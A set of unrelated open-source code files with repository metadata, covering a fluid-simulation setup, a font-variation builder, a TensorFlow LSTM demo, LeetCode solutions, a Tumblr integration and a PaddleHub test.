return lambda x,t: 0.0
def getDBC_u(x,flag):
#return None
if flag == boundaryTags['top']:# or x[2] >= L[2] - 1.0e-12:
return lambda x,t: 0.0
def getDBC_v(x,flag):
#return None
if flag == boundaryTags['top']:# or x[2] >= L[2] - 1.0e-12:
return lambda x,t: 0.0
def getDBC_w(x,flag):
return None
dirichletConditions = {0:getDBC_p,
1:getDBC_u,
2:getDBC_v,
3:getDBC_w}
def getAFBC_p(x,flag):
if flag != boundaryTags['top']:# or x[2] < L[2] - 1.0e-12:
return lambda x,t: 0.0
def getAFBC_u(x,flag):
if flag != boundaryTags['top']:# or x[2] < L[2] - 1.0e-12:
return lambda x,t: 0.0
def getAFBC_v(x,flag):
if flag != boundaryTags['top']:# or x[2] < L[2] - 1.0e-12:
return lambda x,t: 0.0
def getAFBC_w(x,flag):
if flag != boundaryTags['top']:# or x[2] < L[2] - 1.0e-12:
return lambda x,t: 0.0
def getDFBC_u(x,flag):
#return lambda x,t: 0.0
if flag != boundaryTags['top']:# or x[2] < L[2] - 1.0e-12:
return lambda x,t: 0.0
def getDFBC_v(x,flag):
#return lambda x,t: 0.0
if flag != boundaryTags['top']:# or x[2] < L[2] - 1.0e-12:
return lambda x,t: 0.0
def getDFBC_w(x,flag):
return lambda x,t: 0.0
advectiveFluxBoundaryConditions = {0:getAFBC_p,
1:getAFBC_u,
2:getAFBC_v,
3:getAFBC_w}
diffusiveFluxBoundaryConditions = {0:{},
1:{1:getDFBC_u},
2:{2:getDFBC_v},
3:{3:getDFBC_w}}
class PerturbedSurface_p:
def __init__(self,waterLevel):
self.waterLevel=waterLevel
def uOfXT(self,x,t):
if signedDistance(x) < 0:
return -(L[2] - self.waterLevel)*rho_1*g[2] - (self.waterLevel - x[2])*rho_0*g[2]
else:
return -(L[2] - self.waterLevel)*rho_1*g[2]
class AtRest:
def __init__(self):
pass
def uOfXT(self,x,t):
return 0.0
initialConditions = {0:PerturbedSurface_p(waterLine_z),
1:AtRest(),
2:AtRest(),
3:AtRest()}
| [
"cekees@gmail.com"
] | cekees@gmail.com |
44231f06b87758929e1f0c8ac466c426e56613b3 | 4daeb9ebf92d9826028a50bf4e4715c1ab145db1 | /Problem-Set/Basic/CMB02/setup.py | eab1c24574e3d3b0b51084bc6df3274791e02ec0 | [] | no_license | Rahul2025/Thesis | 4148653fcc96d623d602ba58e33cc6465d1cd9f5 | df31863194e2e0b69646e3a48fcaf90541a55c2a | refs/heads/master | 2020-05-02T00:48:09.593873 | 2013-04-21T20:23:02 | 2013-04-21T20:23:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 284 | py | # filename : setup.py
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
ext_modules = [Extension("qq7_tim",["qq7_tim.pyx"])]
setup(
name = 'qq7_tim app',
cmdclass = {'build_ext':build_ext},
ext_modules = ext_modules
) | [
"rahulgupta2025@gmail.com"
] | rahulgupta2025@gmail.com |
df91e4b73c7c761ad92b9cbe3cec04ab0820e5a3 | fc7998b5c544220e149585e83aecd0e7d839cbac | /file_handlers/constants.py | 14cbb1a66c7ce3e0e1b3d45e3f4ac2f8257b4237 | [] | no_license | IgorBolotnikov/karate-cat | 677de2cae874ca1e611bb3d8f8898c42eef808a7 | 54f62c36502ecd568d4545453490476e9d5ce96d | refs/heads/master | 2020-08-08T02:21:05.334408 | 2019-10-14T16:24:39 | 2019-10-14T16:24:39 | 213,675,806 | 0 | 0 | null | 2019-10-14T16:24:40 | 2019-10-08T15:03:17 | null | UTF-8 | Python | false | false | 646 | py | from os import path
BASE_DIR = path.dirname(__file__)
# ===== CSVHandlerMixin CONSTANTS =====
READ = 'r'
WRITE = 'w'
NEWLINE = ''
# ===== SaveFile CONSTANTS =====
SAVE_FILE = BASE_DIR + '/save.csv'
SAVE_HEADERS = ['number', 'name', 'char_class', 'level', 'current_exp',
'wins', 'losses', 'exp_to_levelup', 'exp_cost',
'health', 'strength', 'endurance', 'agility']
SAVE_DELIMITER = ','
SAVE_SLOTS = 5
# ===== CharsFile CONSTANTS =====
CHARS_FILE = BASE_DIR + '/characters.csv'
CHARS_HEADERS = ['class_name', 'description', 'health',
'strength', 'endurance', 'agility']
CHARS_DELIMITER = ','
| [
"igorbolotnikov1993@gmail.com"
] | igorbolotnikov1993@gmail.com |
3672c6325e8a7ec68959e1a5c4e2ac2a68a4a05b | 2d993858f4cf3dad4f67a3cae8d35720f4dea2d3 | /glyphs2gx/glyphs2gx.py | c830bda220e0eb9b6b82f737af6e3803a9f328ce | [] | no_license | behdad/playground | c0889a0b0187a9e9f2eef841023cd679c89c172d | dac6d007feedb6564e5e63eaf906c458246b0e6a | refs/heads/master | 2023-09-05T05:33:42.822972 | 2018-01-21T21:27:26 | 2018-01-21T21:27:51 | 118,373,208 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,878 | py | #!/usr/bin/python
from __future__ import division
import glyphs2ufo.glyphslib
import glyphs2ufo.builder
import cu2qu.ufo
import ufo2ft
import fontmake.font_project
from fontTools.ttLib import TTFont
from fontTools.ttLib.tables._n_a_m_e import NameRecord
from fontTools.ttLib.tables._f_v_a_r import table__f_v_a_r, Axis, NamedInstance
from fontTools.ttLib.tables._g_v_a_r import table__g_v_a_r, GlyphVariation
import warnings
def build_ttfs (srcfile):
print "Loading Glyphs src `%s' into memory" % srcfile
src = fontmake.font_project.FontProject.preprocess(srcfile)
dic = glyphs2ufo.glyphslib.loads(src)
del src
print "Load into UFO objects"
masters, instances = glyphs2ufo.builder.to_ufos(dic, include_instances=True)
del dic
print("Instances:")
from pprint import pprint
pprint(instances)
print "Converting masters to compatible quadratics"
cu2qu.ufo.fonts_to_quadratic(masters, dump_stats=True)
master_ttfs = []
for master in masters:
family = master.info.familyName
style = master.info.styleName
fullname = "%s-%s" % (family, style)
print "Processing master", fullname
print "Compiling master"
ttfont = ufo2ft.compileTTF(master)
outfile = fullname+".ttf"
ttfont.save(outfile)
master_ttfs.append(outfile)
return master_ttfs, masters, instances
def AddName(font, name):
"""(font, "Bold") --> NameRecord"""
nameTable = font.get("name")
namerec = NameRecord()
namerec.nameID = 1 + max([n.nameID for n in nameTable.names] + [256])
namerec.string = name.encode("mac_roman")
namerec.platformID, namerec.platEncID, namerec.langID = (1, 0, 0)
nameTable.names.append(namerec)
return namerec
def AddFontVariations(font, axes, instances):
assert "fvar" not in font
fvar = font["fvar"] = table__f_v_a_r()
for tag in sorted(axes.keys()):
axis = Axis()
axis.axisTag = tag
name, axis.minValue, axis.defaultValue, axis.maxValue = axes[tag]
axis.nameID = AddName(font, name).nameID
fvar.axes.append(axis)
for name, coordinates in instances:
inst = NamedInstance()
inst.nameID = AddName(font, name).nameID
inst.coordinates = coordinates
fvar.instances.append(inst)
def GetCoordinates(font, glyphName):
"""font, glyphName --> glyph coordinates as expected by "gvar" table
The result includes four "phantom points" for the glyph metrics,
as mandated by the "gvar" spec.
"""
glyphTable = font["glyf"]
if glyphName not in glyphTable.glyphs: return None
glyph = glyphTable[glyphName]
if glyph.isComposite():
coord = [c.getComponentInfo()[1][-2:] for c in glyph.components]
else:
coord = list(glyph.getCoordinates(glyphTable)[0])
# Add phantom points for (left, right, top, bottom) positions.
horizontalAdvanceWidth, leftSideBearing = font["hmtx"].metrics[glyphName]
if not hasattr(glyph, 'xMin'):
glyph.recalcBounds(glyphTable)
leftSideX = glyph.xMin - leftSideBearing
rightSideX = leftSideX + horizontalAdvanceWidth
# XXX these are incorrect. Load vmtx and fix.
topSideY = glyph.yMax
bottomSideY = -glyph.yMin
coord.extend([(leftSideX, 0),
(rightSideX, 0),
(0, topSideY),
(0, bottomSideY)])
return coord
def sub(al, bl):
return [(ax-bx,ay-by) for (ax,ay),(bx,by) in zip(al,bl)]
def mul(l, mult):
return [(x*mult,y*mult) for (x,y) in l]
def AddGlyphVariations(out, masters, locations, origin_idx):
# Make copies for modification
masters = masters[:]
locations = [l.copy() for l in locations]
# Move origin to front
origin_master = masters[origin_idx]
origin_location = locations[origin_idx]
del masters[origin_idx], locations[origin_idx]
masters.insert(0, origin_master)
locations.insert(0, origin_location)
del origin_idx, origin_master, origin_location
# Neutral is zero from now on
axis_tags = locations[0].keys()
# Normalize locations
# https://github.com/behdad/fonttools/issues/313
axis_mins = {tag:min(loc[tag] for loc in locations) for tag in axis_tags}
axis_maxs = {tag:max(loc[tag] for loc in locations) for tag in axis_tags}
axis_defaults = locations[0]
for tag in axis_tags:
minval,maxval,defaultval = axis_mins[tag],axis_maxs[tag],axis_defaults[tag]
for l in locations:
v = l[tag]
if v == defaultval:
v = 0
elif v < defaultval:
v = (v - defaultval) / (defaultval - minval)
else:
v = (v - defaultval) / (maxval - defaultval)
l[tag] = v
del axis_mins, axis_maxs, axis_defaults
# Locations are normalized now
# Find new axis mins and maxs
axis_mins = {tag:min(loc[tag] for loc in locations) for tag in axis_tags}
axis_maxs = {tag:max(loc[tag] for loc in locations) for tag in axis_tags}
print "Normalized master positions:"
from pprint import pprint
pprint(locations)
assert "gvar" not in out
gvar = out["gvar"] = table__g_v_a_r()
gvar.version = 1
gvar.reserved = 0
gvar.variations = {}
for glyph in out.getGlyphOrder():
allCoords = [GetCoordinates(m, glyph) for m in masters]
coordsLen = len(allCoords[0])
if (any(len(coords) != coordsLen for coords in allCoords)):
warnings.warn("glyph %s has not the same number of "
"control points in all masters" % glyph)
continue
gvar.variations[glyph] = []
# Subtract origin
allCoords = [sub(coords, allCoords[0]) for coords in allCoords]
# Add deltas for on-axis extremes
for tag in axis_tags:
for value in (axis_mins[tag], axis_maxs[tag]):
if not value: continue
loc = locations[0].copy()
loc[tag] = value
idx = locations.index(loc)
loc, coords = locations[idx], allCoords[idx]
if not coords:
warnings.warn("Glyph not present in a master" + glyph)
continue
# Found master for axis extreme, add delta
var = GlyphVariation({tag: (min(value, 0.), value, max(value, 0.))}, coords)
gvar.variations[glyph].append(var)
def glyphs_ufo_get_weight(font):
return font.lib.get(glyphs2ufo.builder.GLYPHS_PREFIX + 'weightValue', 100)
def glyphs_ufo_get_width(font):
return font.lib.get(glyphs2ufo.builder.GLYPHS_PREFIX + 'widthValue', 100)
def build_gx(master_ttfs, master_ufos):
print "Building GX"
print "Loading TTF masters"
master_fonts = [TTFont(f) for f in master_ttfs]
# Find Regular master
regular_idx = [s.endswith("Regular.ttf") for s in master_ttfs].index(True)
print "Using %s as base font" % master_ttfs[regular_idx]
regular = master_fonts[regular_idx]
regular_weight = glyphs_ufo_get_weight(master_ufos[regular_idx])
regular_width = glyphs_ufo_get_width (master_ufos[regular_idx])
# Set up master locations
master_points = [{'wght': glyphs_ufo_get_weight(m) / regular_weight,
'wdth': glyphs_ufo_get_width (m) / regular_width}
for m in master_ufos]
weights = [m['wght'] for m in master_points]
widths = [m['wdth'] for m in master_points]
print "Master positions:"
from pprint import pprint
pprint(master_points)
# Set up axes
axes = {
'wght': ('Weight', min(weights), weights[regular_idx], max(weights)),
'wdth': ('Width', min(widths), widths [regular_idx], max(widths)),
}
# Set up named instances
instances = {} # None for now
gx = TTFont(master_ttfs[regular_idx])
print "Setting up axes and instances"
AddFontVariations(gx, axes, instances)
print "Setting up glyph variations"
AddGlyphVariations(gx, master_fonts, master_points, regular_idx)
outname = master_ttfs[regular_idx].replace('-Regular', '')
print "Saving GX font", outname
gx.save(outname)
if __name__ == '__main__':
import sys, pickle
for src in sys.argv[1:]:
pickle_file = src + '.pickle'
try:
c = pickle.load(open(pickle_file))
except (IOError, EOFError):
c = {}
if not 'master_ttfs' in c or not 'master_ufos' in c or not 'instances' in c:
c['master_ttfs'], c['master_ufos'], c['instances'] = build_ttfs(src)
#pickle.dump(c, open(pickle_file, 'wb'), pickle.HIGHEST_PROTOCOL)
if not 'gx' in c:
c['gx'] = build_gx(c['master_ttfs'], c['master_ufos'], c['instances'])
| [
"behdad@behdad.org"
] | behdad@behdad.org |
d5fe1d9ee281300a6e27b2147bfe23aafa5eb944 | f4c0172e70ca5ffbe01695245e82a28291f88d04 | /v0.5.2/StudyTensroFlow/studyTF_LSTM_demo_me.py | 44b211578b3a7d8f67f36754f7f8496fed0e5405 | [] | no_license | huangxinkid/DeepLearning_Wavelet-LSTM | a84e667d5f2db477ac5a9993d8ae329ec9fd115f | b726f99a8631fc48e6943655ace222b0f6b0290b | refs/heads/master | 2020-03-24T07:11:52.832149 | 2018-05-30T18:43:38 | 2018-05-30T18:43:38 | 142,556,218 | 0 | 1 | null | 2018-07-27T09:21:18 | 2018-07-27T09:21:18 | null | UTF-8 | Python | false | false | 4,658 | py | """ Recurrent Neural Network.
A Recurrent Neural Network (LSTM) implementation example using TensorFlow library.
This example is using the MNIST database of handwritten digits (http://yann.lecun.com/exdb/mnist/)
Links:
[Long Short Term Memory](http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf)
[MNIST Dataset](http://yann.lecun.com/exdb/mnist/).
Author: Aymeric Damien
Project: https://github.com/aymericdamien/TensorFlow-Examples/
"""
from __future__ import print_function
import tensorflow as tf
from tensorflow.contrib import rnn
# Import MNIST data
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)
'''
To classify images using a recurrent neural network, we consider every image
row as a sequence of pixels. Because MNIST image shape is 28*28px, we will then
handle 28 sequences of 28 steps for every sample.
'''
# Training Parameters
learning_rate = 0.001
# training_steps = 10000
training_steps = 10
batch_size = 128
display_step = 200
# Network Parameters
num_input = 28 # MNIST data input (img shape: 28*28)
timesteps = 28 # timesteps
num_hidden = 128 # hidden layer num of features
num_classes = 10 # MNIST total classes (0-9 digits)
# tf Graph input
X = tf.placeholder("float", [None, timesteps, num_input])
Y = tf.placeholder("float", [None, num_classes])
# Define weights
weights = {
'out': tf.Variable(tf.random_normal([num_hidden, num_classes]))
}
biases = {
'out': tf.Variable(tf.random_normal([num_classes]))
}
def RNN(x, weights, biases):
# Prepare data shape to match `rnn` function requirements
# Current data input shape: (batch_size, timesteps, n_input)
# Required shape: 'timesteps' tensors list of shape (batch_size, n_input)
# Unstack to get a list of 'timesteps' tensors of shape (batch_size, n_input)
x = tf.unstack(x, timesteps, 1)
# Define a lstm cell with tensorflow
lstm_cell = rnn.BasicLSTMCell(num_hidden, forget_bias=1.0)
# Get lstm cell output
outputs, states = rnn.static_rnn(lstm_cell, x, dtype=tf.float32)
# Linear activation, using rnn inner loop last output
return tf.matmul(outputs[-1], weights['out']) + biases['out']
logits = RNN(X, weights, biases)
prediction = tf.nn.softmax(logits) # prediction-预测
# Define loss and optimizer
# 定义 损失函数 和 优化器
loss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
logits=logits, labels=Y))
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
train_op = optimizer.minimize(loss_op)
# Evaluate model (with test logits, for dropout to be disabled)
# 评估模型(使用测试日志,禁用dropout)
correct_pred = tf.equal(tf.argmax(prediction, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
# Initialize the variables (i.e. assign their default value)
# 初始化变量(即分配它们的默认值)
init = tf.global_variables_initializer()
# Start training
# 开始训练
with tf.Session() as sess:
# Run the initializer
# 运行初始化程序
sess.run(init)
for step in range(1, training_steps+1):
batch_x, batch_y = mnist.train.next_batch(batch_size)
# Reshape data to get 28 seq of 28 elements
batch_x = batch_x.reshape((batch_size, timesteps, num_input))
# Run optimization op (backprop)
# 运行优化操作(backprop)
sess.run(train_op, feed_dict={X: batch_x, Y: batch_y})
if step % display_step == 0 or step == 1:
# Calculate batch loss and accuracy
# 计算批次损失和准确性
loss, acc = sess.run([loss_op, accuracy], feed_dict={X: batch_x,
Y: batch_y})
print("Step " + str(step) + ", Minibatch Loss= " + \
"{:.4f}".format(loss) + ", Training Accuracy= " + \
"{:.3f}".format(acc))
print("Optimization Finished(优化完成)!")
# Calculate accuracy for 128 mnist test images
# 计算128个mnist测试图像的准确性
test_len = 128
test_data = mnist.test.images[:test_len].reshape((-1, timesteps, num_input))
test_label = mnist.test.labels[:test_len]
print("Testing Accuracy(测试精度):", \
sess.run(accuracy, feed_dict={X: test_data, Y: test_label}))
# 分类
test_len = 1
test_data = mnist.test.images[:test_len].reshape((-1, timesteps, num_input))
test_label = mnist.test.labels[:test_len]
print(test_data.shape, test_label)
print("分类:", \
sess.run(prediction, feed_dict={X: test_data}))
| [
"hello.sea@qq.com"
] | hello.sea@qq.com |
63d933c42c52f5dad03c2785b2cbacddca98e2da | 256f817910dd698970fab89871c6ce66a3c416e7 | /1. solvedProblems/144. Binary Tree Preorder Traversal/144.py | 50f8569065e9e235a6bb9942442d7b1f0a208ec5 | [] | no_license | tgaochn/leetcode | 5926c71c1555d2659f7db4eff9e8cb9054ea9b60 | 29f1bd681ae823ec6fe755c8f91bfe1ca80b6367 | refs/heads/master | 2023-02-25T16:12:42.724889 | 2021-02-04T21:05:34 | 2021-02-04T21:05:34 | 319,225,860 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,880 | py | # !/usr/bin/env python
# coding: utf-8
"""
Author:
Tian Gao (tgaochn@gmail.com)
CreationDate:
Thu, 09/03/2020, 19:33
# !! Description:
Given a binary tree, return the preorder traversal of its nodes' values.
Example:
Input: [1,null,2,3]
1
\
2
/
3
Output: [1,2,3]
Follow up: Recursive solution is trivial, could you do it iteratively?
"""
from typing import List
import sys
sys.path.append('..')
from utils import binaryTree
from utils import singleLinkedList
from utils import nTree
ListNode = singleLinkedList.ListNode
TreeNode = binaryTree.TreeNode
Node = nTree.Node
null = None
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def preorderTraversal(self, root: TreeNode) -> List[int]:
rlt = []
def traversal(root):
if root is not None:
rlt.append(root.val)
traversal(root.left)
traversal(root.right)
traversal(root)
return rlt
# endFunc
# endClass
def func():
s = Solution()
# !! change function name and para here
myFuncLis = [
s.preorderTraversal,
]
inputParaLis1 = [
binaryTree.buildTree([1, null, 2, 3]),
# singleLinkedList.buildSingleList([])
# binaryTree.buildTree([])
# nTree.buildTree([])
]
inputParaLis2 = [
None,
]
inputParaLis3 = [
None,
]
# !! ====================================
# ! instances that need an empty line
specialTypeLis = [TreeNode, Node]
# ! function and parameters count
inputSetCnt = len(inputParaLis1)
funcCnt = len(myFuncLis)
funcParaCnt = 1
if not inputParaLis3[0] is None:
funcParaCnt = 3
elif not inputParaLis2[0] is None:
funcParaCnt = 2
# ! for each input set
for i in range(inputSetCnt):
inputPara1 = inputParaLis1[i]
para1Splitter = '\n' if isOneInstance(inputPara1, specialTypeLis) else '\t'
inputPara2 = None
para2Splitter = None
inputPara3 = None
para3Splitter = None
# ! start a new line if the parameter is a tree
if funcParaCnt >= 2:
inputPara2 = inputParaLis2[i]
para2Splitter = '\n' if isOneInstance(inputPara2, specialTypeLis) else '\t'
if funcParaCnt >= 3:
inputPara3 = inputParaLis3[i]
para3Splitter = '\n' if isOneInstance(para3Splitter, specialTypeLis) else '\t'
# ! for each function
for j in range(funcCnt):
myFunc = myFuncLis[j]
print('func: \t%s' % myFunc.__name__)
# ! output parameters
if funcParaCnt == 1:
print('input1:%s%s' % (para1Splitter, inputPara1))
rlt = myFunc(inputPara1)
if funcParaCnt == 2:
print('input1:%s%s' % (para1Splitter, inputPara1))
print('input2:%s%s' % (para2Splitter, inputPara2))
rlt = myFunc(inputPara1, inputPara2)
if funcParaCnt == 3:
print('input1:%s%s' % (para1Splitter, inputPara1))
print('input2:%s%s' % (para2Splitter, inputPara2))
print('input3:%s%s' % (para3Splitter, inputPara3))
rlt = myFunc(inputPara1, inputPara2, inputPara3)
# ! output result
rltSplitter = '\n' if isinstance(rlt, TreeNode) else '\t'
print('rlt:%s%s' % (rltSplitter, rlt))
print('==' * 20)
# endFunc
def isOneInstance(myInstance, typeLis):
for curType in typeLis:
if isinstance(myInstance, curType):
return True
return False
# endFunc
def main():
func()
# endMain
if __name__ == "__main__":
main()
# endIf
| [
"tgaochn@gmail.com"
] | tgaochn@gmail.com |
5349216cdfed5b4f42f237fa94627ee5f92d1f1e | 0afe73244e4d0ff7ef2b7f242475f4db2ac844ac | /225-Implement-Stack-Using-Queues.py | 3bfe9a890c44c1fb1883bd83fb9c27e20c678480 | [] | no_license | liuspencersjtu/MyLeetCode | 7261c7cfae4a175c6ca67dfe471e8c847a805a53 | b7d9238d692b1b2f5ab8f73a76d02228a71a4d15 | refs/heads/master | 2023-04-17T04:56:52.999553 | 2023-04-10T06:21:36 | 2023-04-10T06:21:36 | 129,114,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,008 | py | class MyStack:
def __init__(self):
"""
Initialize your data structure here.
"""
self.N = 8
self.storage = []
self.queue = []
def push(self, x: int) -> None:
"""
Push element x onto stack.
"""
if len(self.queue) == self.N:
self.storage.append(self.queue)
self.queue = []
self.queue.append(x)
def pop(self) -> int:
"""
Removes the element on top of the stack and returns that element.
"""
if not self.queue:
newstorage = []
M = len(self.storage)
for i in range(0,M-1):
newstorage.append(self.storage.pop(0))
self.queue = self.storage.pop(0)
self.storage = newstorage
newqueue = []
M = len(self.queue)
for i in range(0,M-1):
newqueue.append(self.queue.pop(0))
res = self.queue.pop(0)
self.queue = newqueue
return res
def top(self) -> int:
"""
Get the top element.
"""
if not self.queue:
newstorage = []
M = len(self.storage)
for i in range(0,M-1):
newstorage.append(self.storage.pop(0))
self.queue = self.storage.pop(0)
self.storage = newstorage
newqueue = []
M = len(self.queue)
for i in range(0,M-1):
newqueue.append(self.queue.pop(0))
res = self.queue.pop(0)
newqueue.append(res)
self.queue = newqueue
return res
def empty(self) -> bool:
"""
Returns whether the stack is empty.
"""
if not self.queue and not self.storage:
return True
else:
return False
# Your MyStack object will be instantiated and called as such:
# obj = MyStack()
# obj.push(x)
# param_2 = obj.pop()
# param_3 = obj.top()
# param_4 = obj.empty()
| [
"liusjtu@163.com"
] | liusjtu@163.com |
42e942cd2287432d6752b37a8aca4c458a069162 | 1eab574606dffb14a63195de994ee7c2355989b1 | /ixnetwork_restpy/testplatform/sessions/ixnetwork/globals/topology/rsvpteif/rsvpteif.py | 88c9ed3fbfd85e9f4cbc16696c5a34b98ce2ce67 | [
"MIT"
] | permissive | steiler/ixnetwork_restpy | 56b3f08726301e9938aaea26f6dcd20ebf53c806 | dd7ec0d311b74cefb1fe310d57b5c8a65d6d4ff9 | refs/heads/master | 2020-09-04T12:10:18.387184 | 2019-11-05T11:29:43 | 2019-11-05T11:29:43 | 219,728,796 | 0 | 0 | null | 2019-11-05T11:28:29 | 2019-11-05T11:28:26 | null | UTF-8 | Python | false | false | 2,597 | py | # MIT LICENSE
#
# Copyright 1997 - 2019 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class RsvpteIf(Base):
"""Rsvp Port Specific Data
The RsvpteIf class encapsulates a required rsvpteIf resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = 'rsvpteIf'
def __init__(self, parent):
super(RsvpteIf, self).__init__(parent)
@property
def Count(self):
"""Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
Returns:
number
"""
return self._get_attribute('count')
@property
def DescriptiveName(self):
"""Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offers more context
Returns:
str
"""
return self._get_attribute('descriptiveName')
@property
def Name(self):
"""Name of NGPF element, guaranteed to be unique in Scenario
Returns:
str
"""
return self._get_attribute('name')
@Name.setter
def Name(self, value):
self._set_attribute('name', value)
@property
def RowNames(self):
"""Name of rows
Returns:
list(str)
"""
return self._get_attribute('rowNames')
def update(self, Name=None):
"""Updates a child instance of rsvpteIf on the server.
Args:
Name (str): Name of NGPF element, guaranteed to be unique in Scenario
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
self._update(locals())
| [
"srvc_cm_packages@keysight.com"
] | srvc_cm_packages@keysight.com |
039cbe8608cd535c8a4a29803b5a2b437830c3b2 | cad8656cd25abaeb310805a603c6b777a9ce36c7 | /th_tumblr/my_tumblr.py | bdb62644a8aeca0260277bc032ea2f201911312c | [
"BSD-3-Clause"
] | permissive | vaibhavsingh97/django-th | 25dce736473a7a3244969e72e35515c147aa7617 | e50c04d2f0961d81738c9d3d9cc3b710d303223f | refs/heads/master | 2021-07-06T07:10:10.323894 | 2017-09-27T22:01:28 | 2017-09-27T22:01:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,945 | py | # coding: utf-8
from pytumblr import TumblrRestClient
# django classes
from django.conf import settings
from django.core.cache import caches
from logging import getLogger
# django_th classes
from django_th.services.services import ServicesMgr
"""
handle process with tumblr
put the following in th_settings.py
TH_TUMBLR = {
'consumer_key': 'abcdefghijklmnopqrstuvwxyz',
'consumer_secret': 'abcdefghijklmnopqrstuvwxyz',
}
"""
logger = getLogger('django_th.trigger_happy')
cache = caches['th_tumblr']
class ServiceTumblr(ServicesMgr):
"""
Service Tumblr
"""
def __init__(self, token=None, **kwargs):
"""
:param token:
:param kwargs:
"""
super(ServiceTumblr, self).__init__(token, **kwargs)
self.AUTH_URL = 'https://www.tumblr.com/oauth/authorize'
self.ACC_TOKEN = 'https://www.tumblr.com/oauth/access_token'
self.REQ_TOKEN = 'https://www.tumblr.com/oauth/request_token'
self.consumer_key = settings.TH_TUMBLR['consumer_key']
self.consumer_secret = settings.TH_TUMBLR['consumer_secret']
self.token = token
self.service = 'ServiceTumblr'
self.oauth = 'oauth1'
if self.token is not None:
token_key, token_secret = self.token.split('#TH#')
self.tumblr = TumblrRestClient(self.consumer_key,
self.consumer_secret,
token_key,
token_secret)
def read_data(self, **kwargs):
"""
get the data from the service
as the pocket service does not have any date
in its API linked to the note,
add the triggered date to the dict data
thus the service will be triggered when data will be found
:param kwargs: contain keyword args : trigger_id at least
:type kwargs: dict
:rtype: list
"""
trigger_id = kwargs.get('trigger_id')
data = list()
cache.set('th_tumblr_' + str(trigger_id), data)
def save_data(self, trigger_id, **data):
"""
let's save the data
:param trigger_id: trigger ID from which to save data
:param data: the data to check to be used and save
:type trigger_id: int
:type data: dict
:return: the status of the save statement
:rtype: boolean
"""
from th_tumblr.models import Tumblr
title, content = super(ServiceTumblr, self).save_data(trigger_id,
**data)
# get the data of this trigger
trigger = Tumblr.objects.get(trigger_id=trigger_id)
# we suppose we use a tag property for this service
status = self.tumblr.create_text(blogname=trigger.blogname,
title=title,
body=content,
state='published',
tags=trigger.tag)
return status
def auth(self, request):
"""
let's auth the user to the Service
:param request: request object
:return: callback url
:rtype: string that contains the url to redirect after auth
"""
request_token = super(ServiceTumblr, self).auth(request)
callback_url = self.callback_url(request)
# URL to redirect user to, to authorize your app
auth_url_str = '{auth_url}?oauth_token={token}'
auth_url_str += '&oauth_callback={callback_url}'
auth_url = auth_url_str.format(auth_url=self.AUTH_URL,
token=request_token['oauth_token'],
callback_url=callback_url)
return auth_url
| [
"foxmaskhome@gmail.com"
] | foxmaskhome@gmail.com |
a0abb5323de5e3698ebe794809bd7fb17ecf33db | 5095200e9ca55cd3a37af34ed44448c02e2a1bb5 | /modules/image/Image_editing/super_resolution/falsr_c/test.py | 7878cff3ec169539bbfd57ca65586924cd80cb63 | [
"Apache-2.0"
] | permissive | PaddlePaddle/PaddleHub | 8712603ef486c45e83eb0bc5725b0b3ed3ddbbde | b402610a6f0b382a978e82473b541ea1fc6cf09a | refs/heads/develop | 2023-07-24T06:03:13.172978 | 2023-03-28T11:49:55 | 2023-03-28T11:49:55 | 162,672,577 | 12,914 | 2,239 | Apache-2.0 | 2023-07-06T21:38:19 | 2018-12-21T06:00:48 | Python | UTF-8 | Python | false | false | 2,228 | py | import os
import shutil
import unittest
import cv2
import numpy as np
import requests
import paddlehub as hub
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
class TestHubModule(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
img_url = 'https://unsplash.com/photos/1sLIu1XKQrY/download?ixid=MnwxMjA3fDB8MXxhbGx8MTJ8fHx8fHwyfHwxNjYyMzQxNDUx&force=true&w=120'
if not os.path.exists('tests'):
os.makedirs('tests')
response = requests.get(img_url)
assert response.status_code == 200, 'Network Error.'
with open('tests/test.jpg', 'wb') as f:
f.write(response.content)
cls.module = hub.Module(name="falsr_c")
@classmethod
def tearDownClass(cls) -> None:
shutil.rmtree('tests')
shutil.rmtree('inference')
shutil.rmtree('falsr_c_output')
def test_reconstruct1(self):
results = self.module.reconstruct(paths=['tests/test.jpg'], use_gpu=False, visualization=False)
self.assertIsInstance(results[0]['data'], np.ndarray)
def test_reconstruct2(self):
